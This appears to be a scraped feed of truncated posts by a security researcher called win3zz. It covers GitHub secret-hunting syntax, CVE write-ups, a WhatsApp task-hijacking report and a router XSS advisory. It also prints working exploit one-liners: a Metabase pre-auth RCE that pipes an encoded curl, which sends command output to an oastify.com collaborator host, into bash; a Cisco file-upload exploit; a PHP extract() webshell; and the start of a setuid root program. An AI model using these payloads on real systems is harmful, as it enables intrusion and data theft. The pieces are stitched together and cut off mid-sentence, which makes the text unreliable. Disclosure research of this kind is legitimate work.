win3zz

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

win3zz

POST /api/v2/accounts 
GET /api/v2/activities?since=cstest 
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest 
GET /api/v2/automations 
POST /api/v2/automations 
GET /api/v2/bookmarks 
POST /api/v2/bookmarks 
GET /api/v2/brands 
POST /api/v2/brands 
GET /api/v2/custom_objects 

win3zz

TARGET="http://127.0.0.1:3000"; \
COLLABORATOR="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oastify.com/"; \
COMMAND="uname -a"; \
ENCODED_COMMAND=$(echo -n "curl -X POST -d \"\$(${COMMAND})\" ${COLLABORATOR}" | base64 | tr -d '\n' | sed 's/=/%3D/g'); \
SETUP_TOKEN=$(curl -s "${TARGET}/api/session/properties" | jq -r '.["setup-token"]'); \
PAYLOAD='{"token":"'${SETUP_TOKEN}'","details":{"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER test BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('\''bash -c {echo,'${ENCODED_COMMAND}'}|{base64,-d}|{bash,-i}'\'')\n$$--=x","advanced-options": false},"engine":"h2"}}'; \
curl -X POST -H "Content-Type: application/json" -d "${PAYLOAD}" "${TARGET}/api/setup/validate"

win3zz

TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"

win3zz

#!/bin/bash

# Display PHP version
php -v

# Create a PHP file containing malicious code using 'extract()'
echo '<?php extract($_GET); $ctx($str); ?>' > extract_test.php

# Display the contents of the created PHP file
cat extract_test.php

win3zz

As a security professional, you know how important it is to keep yourself updated in the InfoSec world. To keep myself updated about security vulnerabilities, I regularly analyze the latest Common Vulnerabilities and Exposures (CVEs). If the Proof of Concept (PoC) or write-up is publicly available, I try to analyze and understand the root cause of the vulnerability.

Today, I'm going to share a recent experience that left me surprised. I came across a public PoC of CVE-2023-3519 - Unauthenticated Remote Code Execution vulnerability in Citrix ADC that was critical (CVSS score: 9.8/10). The PoC was hosted on Github at https://github.com/knitteruntil0s/CVE-2023-3519 (archive).

While reviewing its code, I was surprised that it was my own code that I wrote a few months ago to demonstrate the [GeoServer SQL injection vulnerability (CVE-2023-25157)](https://

win3zz

CVE-2023-21939 - Code Exec - Proof of Concept

Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie

win3zz

Task Hijacking Vulnerability in WhatsApp - Android

Around a year ago, I discovered a long-standing vulnerability in WhatsApp and other popular Android applications. Despite its existence for years, this vulnerability remained largely theoretical. To demonstrate its real-world impact, I successfully exploited it in WhatsApp, Facebook, and Facebook Lite. I promptly reported my findings to Facebook's Whitehat program. In this post, I'll share the details I provided to Facebook.

Don't want to read? Skip the technical details and watch the demo video here: https://youtu.be/1p3tehj3aUQ

Finding Description

While reviewing the WhatsApp Android application we have identified a misconfiguration in AndroidManifest.xml related to task control features. This misconfiguration leads to a critical vulnerability called task hijacking and enables the attack flow against the latest WhatsApp in Android-based phones.

In successful exploitation of the vulnerability, the malicious

win3zz

CVE-2023-43260

Reflected Cross-Site Scripting (XSS) and Absent HttpOnly Flag in Ursalink Industrial Cellular Router Admin Panel Leads to Account Takeover

Vulnerability Details

Cross-Site Scripting (XSS) and Absent HttpOnly Flag vulnerabilities in Ursalink Industrial Cellular Router admin panel could allow remote attackers to execute arbitrary scripts and hijack user sessions, potentially leading to account takeover.

The admin panel does not properly validate and sanitize user inputs, allowing malicious scripts to be injected into the page's content. The "td" session cookie lacks the HttpOnly flag (and also Secure Flag), enabling client-side scripts to access it, leading to session hijacking and unauthorized access. Attackers can steal sensitive information, impersonate users, or perform unauthorized actions.

• Affected Products: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Routers could also be vulnerable.

win3zz

user@hostname:~/exploit$ cat > test.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {